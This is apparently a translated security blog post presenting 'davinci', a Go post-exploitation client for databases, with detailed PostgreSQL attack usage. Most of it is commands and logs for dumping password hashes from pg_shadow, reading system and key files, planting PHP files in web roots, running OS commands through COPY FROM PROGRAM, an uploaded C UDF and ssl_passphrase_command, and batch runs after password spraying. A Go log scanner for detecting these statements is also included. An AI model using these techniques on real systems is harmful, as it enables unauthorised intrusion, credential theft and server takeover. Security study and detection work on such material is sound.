Multi-component client
2024-9-9 16:23:13 Author: mp.weixin.qq.com

  • Preface

  • PostgreSQL as an example

    • Interactive shell

    • Non-interactive command

    • Automated information gathering

    • Writing files

      • lo_export

      • copy to

    • Reading files

      • lo_import

      • pg_read_file

      • copy from

    • Executing system commands

      • CVE-2019-9193 (copy from program)

      • UDF

      • ssl_passphrase_command

    • Creating directories

    • Listing directories

  • Batch execution

    • Execution template

    • Batch execution

On internal networks you constantly run into databases and middleware of all kinds, but because of network segmentation, container environments and other factors, getting a usable client for a component onto a foothold is not always easy. In addition, the official client may not fit certain scenarios, for example when the C2 in use is non-interactive; then a tool that can run a single-line command directly is badly needed.

I used to rely on the official clients: in container environments I sometimes had to build them statically myself, for non-interactive cases I even resorted to expect scripts, and once a client was finally usable, information gathering and exploitation still took many repetitive steps. For someone who prefers to conserve effort this is hard to tolerate, so the idea of writing a tool to solve the problems above came up.

Tool features

  • Supports multiple components: MySQL, PostgreSQL, Clickhouse, GaussDB, MongoDB, Redis, SSH, Elasticsearch

  • Three basic functions:

    • Interactive shell: run commands interactively, similar to what the official clients provide

    • Non-interactive execution: run a command in a single line

    • Information gathering: run a set of preset commands in batch to collect basic information about each component

  • Component-specific functions, including but not limited to system command execution and file read/write, depending on the exploitation techniques each component supports

  • Batch execution: run commands against a group of targets via a template file

  • Written in Go; thanks to Go's cross-compilation, executables for all kinds of environments are easy to build

  • Detailed logging for post-engagement review :)

Note: "command" above means the component's own command, e.g. SQL for MySQL and a system command for SSH.

Tool: https://github.com/Ape1ron/davinci

Below, the tool's usage is introduced through PostgreSQL exploitation.

Each component maps to a subcommand; PostgreSQL maps to pgsql.

    ┌──(rootkali)-[~/tools]
    └─# ./davinci_linux_amd64 pgsql --help
    pgsql client:
    - exec: execute the command once and return directly
    - shell: pgsql interactive shell
    - auto_gather: automatically collect database information, including users, databases,
    tables, table structures, and the first 5 rows of data for each table
    - osshell: exec os shell,three ways: [cve-2019-9193 | udf | ssl_passpharse]
    - writefile: write file,two ways: [lo_export | copy_to]
    - readfile: read file,three ways: [lo_import | pg_read | copy_from]
    - mkdir: create dir through log_directory,premise is logging_collector = on
    - lsdir: list dir through pg_ls_dir
    Example:
    davinci pgsql exec -H 192.168.1.2 -P 5432 -u postgres -p 123456 -c "select user;"
    davinci pgsql shell -H 192.168.1.2 -P 5432 -u postgres -p 123456
    davinci pgsql auto_gather -H 192.168.1.2 -P 5432 -u postgres -p 123456
    davinci pgsql osshell -H 192.168.1.2 -P 5432 -u postgres -p 123456 --cve-2019-9193
    davinci pgsql osshell -H 192.168.1.2 -P 5432 -u postgres -p 123456 --cve-2019-9193 --no-interactive -c "whoami"
    davinci pgsql osshell -H 192.168.1.2 -P 5432 -u postgres -p 123456 --udf
    davinci pgsql osshell -H 192.168.1.2 -P 5432 -u postgres -p 123456 --udf --no-interactive -c "whoami"
    davinci pgsql osshell -H 192.168.1.2 -P 5432 -u postgres -p 123456 --ssl_passpharse -c "whoami"
    davinci pgsql writefile -H 192.168.1.2 -P 5432 -u postgres -p 123456 --lo_export -s ./eval.php -t /var/www/html/1.php
    davinci pgsql writefile -H 192.168.1.2 -P 5432 -u postgres -p 123456 --copy_to -C "<?php phpinfo(); ?>" -t /var/www/html/1.php
    davinci pgsql readfile -H 192.168.1.2 -P 5432 -u postgres -p 123456 --lo_import -t /etc/passwd
    davinci pgsql readfile -H 192.168.1.2 -P 5432 -u postgres -p 123456 --pg_read -t /etc/passwd
    davinci pgsql readfile -H 192.168.1.2 -P 5432 -u postgres -p 123456 --copy_from -t /etc/passwd --hex
    davinci pgsql mkdir -H 192.168.1.2 -P 5432 -u postgres -p 123456 -t /etc/pg_dir
    davinci pgsql lsdir -H 192.168.1.2 -P 5432 -u postgres -p 123456 -t /
    Usage:
    davinci pgsql [exec|shell|auto_gather|osshell|writefile|readfile|mkdir|lsdir] [flags]
    Flags:
    -c, --cmd string cmd to be executed, used in exec(sql) and osshell(shell) mode
    -C, --content string [write] write content to target,use for write file mode,choose one of content and source
    --copy_from [read] use copy from to readfile
    --copy_to [write] use 'copy to' to readfile
    --cve-2019-9193 [osshell] use cve-2019-9193(copy from program) to exec,support version>=9.3
    -d, --dbName string database name,not require
    -h, --help help for pgsql
    --hex [write/read] encode write/read file content
    -H, --host string pgsql ip addr (default "127.0.0.1")
    --lo_export [write] use lo_export to readfile
    --lo_import [read] use lo_import to readfile
    --no-interactive no-interactive with os shell
    -p, --passwd string pasword
    --pg_read [read] use pg_read to readfile
    -P, --port int pgsql port (default 5432)
    -s, --source string [write] (local) source file path,use for write file mode
    --ssl_passpharse [osshell] use pgconfig ssl passpharse to exec,support version>=11
    -t, --target string [write/read] (remote) target file path,use for write/read file mode
    --udf [osshell] use udf to exec
    -u, --user string username (default "postgres")
    Global Flags:
    --no-log not log to file
    --silent close info level output

Interactive shell

    ┌──(rootkali)-[~/tools]
    └─# ./davinci pgsql shell -H 192.168.83.129 -P 5432 -p 123456
    > select version()
    2024/09/07 09:35:15 [info] execute sql: select version()
    +--------------------------------+
    | VERSION |
    +--------------------------------+
    | PostgreSQL 16.4 (Debian |
    | 16.4-1.pgdg120+1) on |
    | x86_64-pc-linux-gnu, compiled |
    | by gcc (Debian 12.2.0-14) |
    | 12.2.0, 64-bit |
    +--------------------------------+
    > exit

Non-interactive command

    ┌──(rootkali)-[~/tools]
    └─# ./davinci pgsql exec -H 192.168.83.129 -P 5432 -p 123456 -c "select version()"
    2024/09/07 09:36:27 [info] execute sql: select version()
    +--------------------------------+
    | VERSION |
    +--------------------------------+
    | PostgreSQL 16.4 (Debian |
    | 16.4-1.pgdg120+1) on |
    | x86_64-pc-linux-gnu, compiled |
    | by gcc (Debian 12.2.0-14) |
    | 12.2.0, 64-bit |
    +--------------------------------+

Automated information gathering

The gathering logic is as follows:

  • Get the version information

  • Get the list of database users

  • Get the list of programming languages supported by the database (pg_language)

  • Get the list of databases

  • Iterate over the databases to get all schemas (built-in databases are excluded automatically)

  • Iterate over all schemas to get all tables (built-in schemas are excluded automatically)

  • Get each table's structure, row count and first 5 rows

  • Get the list of all extensions (pg_available_extensions)

  • Get the database configuration (pg_settings)

Usage

    ┌──(rootkali)-[~/tools]
    └─# ./davinci pgsql auto_gather -H 192.168.83.129 -P 5432 -p 123456
    2024/09/07 09:45:54 [info] get version
    2024/09/07 09:45:54 [info] execute sql: select version();
    +--------------------------------+
    | VERSION |
    +--------------------------------+
    | PostgreSQL 16.4 (Debian |
    | 16.4-1.pgdg120+1) on |
    | x86_64-pc-linux-gnu, compiled |
    | by gcc (Debian 12.2.0-14) |
    | 12.2.0, 64-bit |
    +--------------------------------+
    2024/09/07 09:45:54 [info] get users
    2024/09/07 09:45:54 [info] execute sql: SELECT usename,passwd FROM pg_shadow;
    +----------+---------------------------------------------------------------------------------------------------------------------------------------+
    | USENAME | PASSWD |
    +----------+---------------------------------------------------------------------------------------------------------------------------------------+
    | postgres | SCRAM-SHA-256$4096:IgY4gbZGYJm+Izbd5oY/Sg==$mImJT90qIRjmncKZUF6AdNcPHrReGcQlx/jSviY4r0w=:tPjBnjvHwBErOD8XsO/XANg4t6np9BgmxC/DrG7k0kc= |
    +----------+---------------------------------------------------------------------------------------------------------------------------------------+
    2024/09/07 09:45:54 [info] get pg_language
    2024/09/07 09:45:54 [info] execute sql: select * from pg_language
    +-------+----------+----------+---------+--------------+---------------+-----------+--------------+--------+
    | OID | LANNAME | LANOWNER | LANISPL | LANPLTRUSTED | LANPLCALLFOID | LANINLINE | LANVALIDATOR | LANACL |
    +-------+----------+----------+---------+--------------+---------------+-----------+--------------+--------+
    | 12 | internal | 10 | false | false | 0 | 0 | 2246 | |
    | 13 | c | 10 | false | false | 0 | 0 | 2247 | |
    | 14 | sql | 10 | false | true | 0 | 0 | 2248 | |
    | 13568 | plpgsql | 10 | true | true | 13565 | 13566 | 13567 | |
    +-------+----------+----------+---------+--------------+---------------+-----------+--------------+--------+
    2024/09/07 09:45:54 [info] get databases
    2024/09/07 09:45:54 [info] execute sql: SELECT datname FROM pg_catalog.pg_database;
    +-----------+
    | DATNAME |
    +-----------+
    | postgres |
    | template1 |
    | template0 |
    +-----------+
    2024/09/07 09:45:54 [info] exclude database(built-in): template1,template0
    2024/09/07 09:45:54 [info] get current database
    2024/09/07 09:45:54 [info] execute sql: select current_database();
    +------------------+
    | CURRENT DATABASE |
    +------------------+
    | postgres |
    +------------------+
    2024/09/07 09:45:54 [info] get database size: postgres
    2024/09/07 09:45:54 [info] execute sql: SELECT pg_size_pretty( pg_database_size('postgres') );
    +----------------+
    | PG SIZE PRETTY |
    +----------------+
    | 7484 kB |
    +----------------+
    2024/09/07 09:45:54 [info] get schemas
    2024/09/07 09:45:54 [info] execute sql: SELECT schema_name,catalog_name,sql_path FROM information_schema.schemata;
    +--------------------+--------------+----------+
    | SCHEMA NAME | CATALOG NAME | SQL PATH |
    +--------------------+--------------+----------+
    | public | postgres | |
    | information_schema | postgres | |
    | pg_catalog | postgres | |
    | pg_toast | postgres | |
    +--------------------+--------------+----------+
    2024/09/07 09:45:54 [info] exclude schemas(built-in): pg_toast,pg_temp_1,pg_toast_temp_1,pg_catalog,information_schema
    2024/09/07 09:45:54 [info] [info] get tables in public
    2024/09/07 09:45:54 [info] execute sql: SELECT table_name from information_schema.tables where table_schema='public'
    +------------+
    | TABLE NAME |
    +------------+
    +------------+
    2024/09/07 09:45:54 [info] get extensions
    2024/09/07 09:45:54 [info] execute sql: select * from pg_available_extensions
    +--------------------+-----------------+-------------------+--------------------------------+
    | NAME | DEFAULT VERSION | INSTALLED VERSION | COMMENT |
    +--------------------+-----------------+-------------------+--------------------------------+
    | autoinc | 1.0 | | functions for autoincrementing |
    | ... | | | ... |
    +--------------------+-----------------+-------------------+--------------------------------+
    2024/09/07 09:45:56 [info] get pg settings
    2024/09/07 09:45:56 [info] execute sql: select name,setting from pg_settings
    +---------------------------------------------+------------------------------------------+
    | NAME | SETTING |
    +---------------------------------------------+------------------------------------------+
    | allow_in_place_tablespaces | off |
    | ... | ... |
    +---------------------------------------------+------------------------------------------+

Writing files

Two ways of writing a file are supported:

  • lo_export

  • copy to

Both support two parameters for specifying the content to write:

  • -C: give the content directly on the command line

  • -s: give a source file path; the program reads that local file and uses it as the content

lo_export is recommended as the first choice for writing files.

Writing files with lo_export

  • Supports relative paths; the default directory is /var/lib/postgresql/data/

  • Supports binary writes

  • Supports overwriting existing files

  • Supports multi-line files

Usage

    ┌──(rootkali)-[~/tools]
    └─# ./davinci pgsql writefile --lo_export -H 192.168.83.129 -P 5432 -p 123456 -s 1.php -t /tmp/1.php
    2024/09/07 10:56:13 [info] execute sql: select count(*) from pg_largeobject where loid=172132
    2024/09/07 10:56:13 [info] lo_export write file
    2024/09/07 10:56:13 [info] execute sql: select lo_from_bytea(172132,decode('3c3f70687020706870696e666f28293b203f3e0a','hex'));
    2024/09/07 10:56:13 [info] execute sql: select lo_export(172132, '/tmp/1.php');
    2024/09/07 10:56:13 [info] write success
    2024/09/07 10:56:13 [info] execute sql: select lo_unlink(172132)

You can also use -C to give the content directly:

    ┌──(rootkali)-[~/tools]
    └─# ./davinci pgsql writefile --lo_export -H 192.168.83.129 -P 5432 -p 123456 -C '<?php phpinfo(); ?>' -t /tmp/2.php
    2024/09/07 10:59:00 [info] execute sql: select count(*) from pg_largeobject where loid=139935
    2024/09/07 10:59:00 [info] lo_export write file
    2024/09/07 10:59:00 [info] execute sql: select lo_from_bytea(139935,decode('3c3f70687020706870696e666f28293b203f3e','hex'));
    2024/09/07 10:59:00 [info] execute sql: select lo_export(139935, '/tmp/2.php');
    2024/09/07 10:59:00 [info] write success
    2024/09/07 10:59:00 [info] execute sql: select lo_unlink(139935)

Writing files with copy to

copy to can only write single-line files, because every newline character gets escaped; lo_export is recommended first.

Usage

    ┌──(rootkali)-[~/tools]
    └─# ./davinci pgsql writefile --copy_to -H 192.168.83.129 -P 5432 -p 123456 -C '<?php phpinfo(); ?>' -t /tmp/3.php
    2024/09/07 11:01:04 [info] copy to write file
    2024/09/07 11:01:04 [info] execute sql: copy (select convert_from(decode('3c3f70687020706870696e666f28293b203f3e','hex'),'utf-8')) to '/tmp/3.php';
    2024/09/07 11:01:04 [info] write success

Reading files

Three ways of reading a file are supported:

  • lo_import

  • pg_read_file

  • copy from

All three support the --hex parameter; when it is given, the file content read is hex-encoded automatically, which is mostly used for reading binary files.

Reading files with lo_import

  • Only read permission is required; the directory is not restricted

  • Can read binary files

    ┌──(rootkali)-[~/tools]
    └─# ./davinci pgsql readfile --lo_import -H 192.168.83.129 -P 5432 -p 123456 -t /tmp/1.php
    2024/09/07 11:19:04 [info] read file by lo_import()
    2024/09/07 11:19:04 [info] execute sql: select count(*) from pg_largeobject where loid=083516
    2024/09/07 11:19:04 [info] execute sql: select lo_import('/tmp/1.php',083516);
    2024/09/07 11:19:04 [info] execute sql: select data from pg_largeobject where loid=083516
    2024/09/07 11:19:04 [info] execute sql: select lo_unlink(083516)
    <?php phpinfo(); ?>

Add --hex to encode the result:

    ┌──(rootkali)-[~/tools]
    └─# ./davinci pgsql readfile --lo_import -H 192.168.83.129 -P 5432 -p 123456 -t /tmp/1.php --hex
    2024/09/07 11:19:39 [info] read file by lo_import()
    2024/09/07 11:19:39 [info] execute sql: select count(*) from pg_largeobject where loid=164009
    2024/09/07 11:19:39 [info] execute sql: select lo_import('/tmp/1.php',164009);
    2024/09/07 11:19:39 [info] execute sql: select encode(data,'hex') from pg_largeobject where loid=164009
    2024/09/07 11:19:39 [info] execute sql: select lo_unlink(164009)
    3c3f70687020706870696e666f28293b203f3e0a

Reading files with pg_read_file

  • On some versions, only files under the directories pointed to by the data_directory and log_directory settings can be accessed.

    select current_setting('data_directory')
    select current_setting('log_directory')

Usage

    ┌──(rootkali)-[~/tools]
    └─# ./davinci pgsql readfile --pg_read -H 192.168.83.129 -P 5432 -p 123456 -t /tmp/1.php
    2024/09/07 11:24:13 [info] read file by pg_read_file
    2024/09/07 11:24:13 [info] execute sql: select pg_read_file('/tmp/1.php')
    <?php phpinfo(); ?>

Reading files with copy from

    ┌──(rootkali)-[~/tools]
    └─# ./davinci pgsql readfile --copy_from -H 192.168.83.129 -P 5432 -p 123456 -t /tmp/1.php
    2024/09/07 11:25:19 [info] read file by copy from
    2024/09/07 11:25:19 [info] [info] get tables in postgres
    2024/09/07 11:25:19 [info] execute sql: SELECT table_name from information_schema.tables where table_schema='postgres'
    2024/09/07 11:25:19 [info] execute sql: create table IqOhlvlLoU(data TEXT);
    2024/09/07 11:25:19 [info] execute sql: copy IqOhlvlLoU from '/tmp/1.php';
    2024/09/07 11:25:19 [info] execute sql: select data from IqOhlvlLoU
    2024/09/07 11:25:19 [info] execute sql: drop table IqOhlvlLoU;
    <?php phpinfo(); ?>

Executing system commands

Three ways of executing system commands are supported:

  • CVE-2019-9193 / copy from program

  • UDF

  • ssl_passphrase_command

CVE-2019-9193 (copy from program) is recommended as the first choice for executing system commands.

Executing system commands with CVE-2019-9193 (copy from program)

Although a CVE number was assigned (tagged disputed), PostgreSQL upstream does not regard this technique as a security vulnerability but as intended functionality; see https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/

Consequently the technique works from version 9.3 (which introduced copy from program) all the way to the current latest release, 16.

    ┌──(rootkali)-[~/tools]
    └─# ./davinci pgsql osshell --cve-2019-9193 -H 192.168.83.129 -P 5432 -p 123456
    > pwd
    2024/09/07 14:02:36 [info] [info] get tables in postgres
    2024/09/07 14:02:36 [info] execute sql: SELECT table_name from information_schema.tables where table_schema='postgres'
    2024/09/07 14:02:36 [info] execute sql: CREATE TABLE LCQUfcYtqd(output text);
    2024/09/07 14:02:36 [info] execute sql: COPY LCQUfcYtqd FROM PROGRAM 'pwd';
    2024/09/07 14:02:36 [info] execute sql: select output from LCQUfcYtqd
    2024/09/07 14:02:36 [info] execute sql: DROP TABLE IF EXISTS LCQUfcYtqd;
    /var/lib/postgresql/data

Similarly, you can pass --no-interactive to run a single command non-interactively:

    ┌──(rootkali)-[~/tools]
    └─# ./davinci pgsql osshell --cve-2019-9193 -H 192.168.83.129 -P 5432 -p 123456 --no-interactive -c "pwd" --silent
    /var/lib/postgresql/data

Executing system commands with a UDF

When the UDF is loaded for the first time, the shared library has to be uploaded and the UDF created; the UDF is not removed automatically on exit.

    ┌──(rootkali)-[~/tools]
    └─# ./davinci pgsql osshell --udf -H 192.168.83.129 -P 5432 -p 123456
    > pwd
    2024/09/07 14:13:14 [info] execute sql: select * from pg_proc where proname='sys_eval'
    2024/09/07 14:13:14 [info] execute sql: show server_version
    2024/09/07 14:13:14 [info] execute sql: select version()
    2024/09/07 14:13:14 [info] os: linux , platform: x86_64, version: 16.4 (Debian 16.4-1.pgdg120+1)
    2024/09/07 14:13:14 [info] main version: 16
    2024/09/07 14:13:14 [info] execute sql: select current_setting('data_directory')
    2024/09/07 14:13:14 [info] execute sql: select count(*) from pg_largeobject where loid=079233
    2024/09/07 14:13:14 [info] lo_export write file
    2024/09/07 14:13:14 [info] execute sql: select lo_from_bytea(079233,decode('74....','hex'));
    2024/09/07 14:13:14 [info] execute sql: select lo_export(079233, '/var/lib/postgresql/data/BodhUbRg.so');
    2024/09/07 14:13:14 [info] write success
    2024/09/07 14:13:14 [info] execute sql: select lo_unlink(079233)
    2024/09/07 14:13:14 [info] execute sql: create or replace function sys_eval(text) returns text as '/var/lib/postgresql/data/BodhUbRg.so','sys_eval' language c strict;
    2024/09/07 14:13:14 [info] execute sql: select sys_eval('pwd')
    /var/lib/postgresql/data
    > whoami
    2024/09/07 14:13:24 [info] execute sql: select * from pg_proc where proname='sys_eval'
    2024/09/07 14:13:24 [info] execute sql: select sys_eval('whoami')
    postgres

You can remove the UDF as follows:

    ./davinci pgsql exec -H 192.168.83.129 -u postgres -p myPass@123 -c "drop function sys_eval"

Since PostgreSQL 8.2 the shared library is version-checked (per minor version before 10, per major version from 10 on), so a separate library has to be compiled for each version. The tool ships UDF libraries for a number of Linux versions and automatically gathers the information needed to pick the matching one.

  • X86_64: 8.2-8.4, 9.0-9.6, 10-16

  • X86_32: 8.2-8.4, 9.0-9.6, 10-15

  • ARM64: 9.1-9.6, 10-16

If your target is not in the preset list, you can build a library yourself as follows:

  1. Identify the target version and download the matching postgresql-server-dev

  2. Upload /davinci/lib/postgresql/eval.c to the build machine

  3. Run the compile command; /usr/include/postgresql/10/server is the directory containing the postgres.h header

    gcc -Wall -I/usr/include/postgresql/10/server -Os -shared eval.c -fPIC -o lib_postgresqludf_sys_eval_exec.so

See also: https://infosecwriteups.com/compiling-postgres-library-for-exploiting-udf-to-rce-d8cfd197bdf9

Executing system commands with ssl_passphrase_command

Reference: https://pulsesecurity.co.nz/articles/postgres-sqli

Principle: when ssl_passphrase_command is set in postgresql.conf, the configured command is invoked whenever the passphrase for the SSL key file is needed. Upload a pem and key to the target server, read and overwrite the configuration file, and the command is executed when the configuration is reloaded.

Exploitation conditions:

  • The location of the PG_VERSION file must be known (it does not strictly have to be PG_VERSION: pgsql only loads a private key file whose permissions are 0600, so in theory any 0600 file in the pgsql directory would do, but PG_VERSION is the one whose overwrite has the least impact); by default it sits in the conf directory, which is fairly easy to read

  • pg version >= 11; ssl_passphrase_command is only supported from 11 on

Note that this method returns no command output.

Usage:

    ┌──(rootkali)-[~/tools]
    └─# ./davinci pgsql osshell --ssl_passpharse -H 192.168.83.129 -P 5432 -p 123456 -c "touch /tmp/ssl_passpharse_test.txt"
    2024/09/07 16:06:47 [info] execute sql: show server_version
    2024/09/07 16:06:47 [info] read file by lo_import()
    2024/09/07 16:06:47 [info] execute sql: select count(*) from pg_largeobject where loid=724369
    2024/09/07 16:06:47 [info] execute sql: select lo_import('/etc/ssl/private/ssl-cert-snakeoil.key',724369);
    2024/09/07 16:06:47 [info] execute sql: select data from pg_largeobject where loid=724369
    2024/09/07 16:06:47 [info] execute sql: select lo_unlink(724369)
    2024/09/07 16:06:47 [info] execute sql: select current_setting('data_directory')
    2024/09/07 16:06:47 [info] execute sql: select count(*) from pg_largeobject where loid=591751
    2024/09/07 16:06:47 [info] lo_export write file
    2024/09/07 16:06:47 [info] execute sql: select lo_from_bytea(591751,decode('...','hex'));
    2024/09/07 16:06:47 [info] execute sql: select lo_export(591751, '/var/lib/postgresql/data/PG_VERSION');
    2024/09/07 16:06:47 [info] write success
    2024/09/07 16:06:47 [info] execute sql: select lo_unlink(591751)
    2024/09/07 16:06:47 [info] execute sql: select setting from pg_settings where name='config_file'
    2024/09/07 16:06:47 [info] config_file: /var/lib/postgresql/data/postgresql.conf
    2024/09/07 16:06:47 [info] read file by pg_read_file
    2024/09/07 16:06:47 [info] execute sql: select pg_read_file('/var/lib/postgresql/data/postgresql.conf')
    2024/09/07 16:06:47 [info] execute sql: select count(*) from pg_largeobject where loid=080308
    2024/09/07 16:06:47 [info] lo_export write file
    2024/09/07 16:06:47 [info] execute sql: select lo_from_bytea(080308,decode('...','hex'));
    2024/09/07 16:06:47 [info] execute sql: select lo_export(080308, '/var/lib/postgresql/data/postgresql.conf');
    2024/09/07 16:06:47 [info] write success
    2024/09/07 16:06:47 [info] execute sql: select lo_unlink(080308)
    2024/09/07 16:06:47 [info] execute sql: select pg_reload_conf();
    2024/09/07 16:06:47 [info] exec success

Creating directories

Reference: https://www.yulegeyu.com/2020/11/16/Postgresql-Superuser-SQL%E6%B3%A8%E5%85%A5-RCE%E4%B9%8B%E6%97%85/

Exploitation conditions

  • The target already has logging_collector = on (off by default)

Principle: when PostgreSQL's logging collector is enabled, log_directory in postgresql.conf specifies where logs are stored; if it is changed to a directory that does not exist, that directory is created.

Usage

    ┌──(rootkali)-[~/tools]
    └─# ./davinci pgsql mkdir -H 192.168.83.129 -P 5432 -p 123456 -t /tmp/test
    2024/09/07 16:46:13 [info] execute sql: select setting from pg_settings where name='logging_collector'
    2024/09/07 16:46:13 [info] execute sql: select setting from pg_settings where name='config_file'
    2024/09/07 16:46:13 [info] config_file: /var/lib/postgresql/data/postgresql.conf
    2024/09/07 16:46:13 [info] read file by pg_read_file
    2024/09/07 16:46:13 [info] execute sql: select pg_read_file('/var/lib/postgresql/data/postgresql.conf')
    2024/09/07 16:46:13 [info] execute sql: select count(*) from pg_largeobject where loid=945798
    2024/09/07 16:46:13 [info] lo_export write file
    2024/09/07 16:46:13 [info] execute sql: select lo_from_bytea(945798,decode('...','hex'));
    2024/09/07 16:46:14 [info] execute sql: select lo_export(945798, '/var/lib/postgresql/data/postgresql.conf');
    2024/09/07 16:46:14 [info] write success
    2024/09/07 16:46:14 [info] execute sql: select lo_unlink(945798)
    2024/09/07 16:46:14 [info] execute sql: select pg_reload_conf();
    2024/09/07 16:46:14 [info] execute sql: select setting from pg_settings where name='log_directory'
    2024/09/07 16:46:14 [info] execute sql: select count(*) from pg_largeobject where loid=660165
    2024/09/07 16:46:14 [info] execute sql: select lo_import('/tmp/test',660165);
    2024/09/07 16:46:14 [info] mkdir dir success

Note that this technique changes the database's log directory.

Listing directories

Directories are listed with the pg_ls_dir function:

    ┌──(rootkali)-[~/tools]
    └─# ./davinci pgsql lsdir -H 192.168.83.129 -P 5432 -p 123456 -t /
    2024/09/07 16:31:44 [info] list dir by pg_ls_dir
    2024/09/07 16:31:44 [info] execute sql: select pg_ls_dir('/')
    +----------------------------+
    | PG LS DIR |
    +----------------------------+
    | home |
    | media |
    | sys |
    | sbin |
    | var |
    | mnt |
    | etc |
    | dev |
    | lib |
    | bin |
    | usr |
    | run |
    | boot |
    | tmp |
    | proc |
    | opt |
    | lib64 |
    | srv |
    | root |
    | .dockerenv |
    | docker-entrypoint-initdb.d |
    +----------------------------+
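The file write, file read, system command, mkdir and lsdir sections above all boil down to a handful of SQL statements that davinci issues and that PostgreSQL will log verbatim when log_statement = 'all'. The following is an added example, not code from the original post or from the davinci project: a small Go scanner that flags those statements in server log lines. The sample log is constructed here in the shape of log_line_prefix = '%m [%p] %u@%d ', and the rule labels are this example's own.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// rule pairs a label with the statement pattern that indicates it.
type rule struct {
	label string
	re    *regexp.Regexp
}

// Patterns taken from the SQL this page shows davinci issuing. Matching is
// case-insensitive because PostgreSQL keywords and function names are.
var rules = []rule{
	{"copy_from_program", regexp.MustCompile(`(?i)\bcopy\b.*\bfrom\s+program\b`)},                   // OS command execution (CVE-2019-9193 pattern)
	{"c_udf", regexp.MustCompile(`(?i)\bcreate\s+(or\s+replace\s+)?function\b.*\blanguage\s+c\b`)}, // function backed by an uploaded shared library
	{"lo_export", regexp.MustCompile(`(?i)\blo_export\s*\(`)},                                       // server-side file write
	{"copy_to_file", regexp.MustCompile(`(?i)\bcopy\b.*\bto\s+'`)},                                 // server-side file write
	{"lo_import", regexp.MustCompile(`(?i)\blo_import\s*\(`)},                                       // server-side file read
	{"pg_read_file", regexp.MustCompile(`(?i)\bpg_read_file\s*\(`)},                                 // server-side file read
	{"copy_from_file", regexp.MustCompile(`(?i)\bcopy\b.*\bfrom\s+'`)},                             // server-side file read
	{"pg_ls_dir", regexp.MustCompile(`(?i)\bpg_ls_dir\s*\(`)},                                       // directory listing
	{"pg_reload_conf", regexp.MustCompile(`(?i)\bpg_reload_conf\s*\(`)},                             // reload after a possible postgresql.conf overwrite
}

// stmtRe extracts the SQL from a line logged with log_statement = 'all'
// ("statement:" lines, and "execute <name>:" lines for prepared statements).
var stmtRe = regexp.MustCompile(`LOG:\s+(?:statement|execute [^:]+):\s+(.*)$`)

// Classify returns the labels of every rule the line's statement matches, in
// rule order; lines that carry no statement yield nil.
func Classify(line string) []string {
	m := stmtRe.FindStringSubmatch(line)
	if m == nil {
		return nil
	}
	sql := strings.TrimSpace(m[1])
	var hits []string
	for _, r := range rules {
		if r.re.MatchString(sql) {
			hits = append(hits, r.label)
		}
	}
	return hits
}

// Finding is one flagged log line together with its labels.
type Finding struct {
	Line   string
	Labels []string
}

// Scan runs Classify over a log and keeps only the lines that matched.
func Scan(lines []string) []Finding {
	var out []Finding
	for _, l := range lines {
		if labels := Classify(l); len(labels) > 0 {
			out = append(out, Finding{Line: l, Labels: labels})
		}
	}
	return out
}

// Constructed sample log (log_line_prefix = '%m [%p] %u@%d ', log_statement = 'all');
// the statements mirror the ones shown on this page, the last line is ordinary traffic.
var sampleLog = []string{
	"2024-09-07 09:35:15.101 UTC [2201] postgres@postgres LOG:  statement: select version()",
	"2024-09-07 10:56:13.220 UTC [2201] postgres@postgres LOG:  statement: select lo_export(172132, '/tmp/1.php');",
	"2024-09-07 11:01:04.003 UTC [2201] postgres@postgres LOG:  statement: copy (select convert_from(decode('3c3f','hex'),'utf-8')) to '/tmp/3.php';",
	"2024-09-07 11:24:13.550 UTC [2201] postgres@postgres LOG:  statement: select pg_read_file('/tmp/1.php')",
	"2024-09-07 11:25:19.770 UTC [2201] postgres@postgres LOG:  statement: copy IqOhlvlLoU from '/tmp/1.php';",
	"2024-09-07 14:02:36.482 UTC [2201] postgres@postgres LOG:  statement: COPY LCQUfcYtqd FROM PROGRAM 'pwd';",
	"2024-09-07 14:13:14.900 UTC [2201] postgres@postgres LOG:  statement: create or replace function sys_eval(text) returns text as '/var/lib/postgresql/data/BodhUbRg.so','sys_eval' language c strict;",
	"2024-09-07 16:06:47.130 UTC [2201] postgres@postgres LOG:  statement: select pg_reload_conf();",
	"2024-09-07 16:31:44.640 UTC [2201] postgres@postgres LOG:  statement: select pg_ls_dir('/')",
	"2024-09-07 16:40:00.000 UTC [2202] app@appdb LOG:  statement: select id, name from customers where id = 42",
}

func main() {
	for _, f := range Scan(sampleLog) {
		fmt.Printf("%s\n    -> %s\n", f.Line, strings.Join(f.Labels, ", "))
	}
}
```

The role in the %u field matters as much as the statement: since PostgreSQL 11, COPY ... FROM PROGRAM needs superuser or membership in pg_execute_server_program, and COPY to or from a server file, pg_read_file and pg_ls_dir need superuser, membership in pg_read_server_files / pg_write_server_files, or an explicit EXECUTE grant, so a hit from an application role that should hold none of these is itself the finding. Logging every statement is expensive, so log_statement = 'all' is typically switched on for a suspect instance rather than fleet-wide; the rules here cover only the statements this page documents.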

Batch execution

On an internal network it is common to end up with access to several instances of different components, e.g. through password spraying; this feature runs a set of commands against multiple targets at once.

Execution template

Batch execution uses a configuration file to define the execution plan; a template can be exported with the following command:

    ┌──(rootkali)-[~/tools]
    └─# ./davinci batch export
    2024/09/07 15:01:41 [info] export batch config template success: .davinci_batch.json
    ┌──(rootkali)-[~/tools]
    └─# cat .davinci_batch.json
    [
      {
        "cmd_type": "ssh",
        "hosts": [
          "127.0.0.1",
          "192.168.83.1/24",
          "192.168.83.1-20"
        ],
        "port": 22,
        "user": "root",
        "passwd": "123456",
        "cmds": [
          "ls -al /",
          "ifconfig"
        ]
      },
      {
        "cmd_type": "redis",
        "hosts": [
          "127.0.0.1"
        ],
        "port": 6379,
        "cmds": [
          "dbsize"
        ]
      }
    ]

The configuration file is an array; each element corresponds to one batch of targets, as shown below. Targets that share type, port, username and password can be grouped into one batch.

    type batchExec struct {
        CmdType string   `json:"cmd_type"`         // type: ssh, mysql, pgsql, gaussdb, clickhouse, redis, mongo
        Hosts   []string `json:"hosts"`            // hostnames or IPs; IPs support the three notations shown in the exported file
        Port    int      `json:"port,omitempty"`   // port
        User    string   `json:"user,omitempty"`   // username
        Passwd  string   `json:"passwd,omitempty"` // password
        Cmds    []string `json:"cmds"`             // commands to run; each one corresponds to ./davinci {service} exec xxx
    }
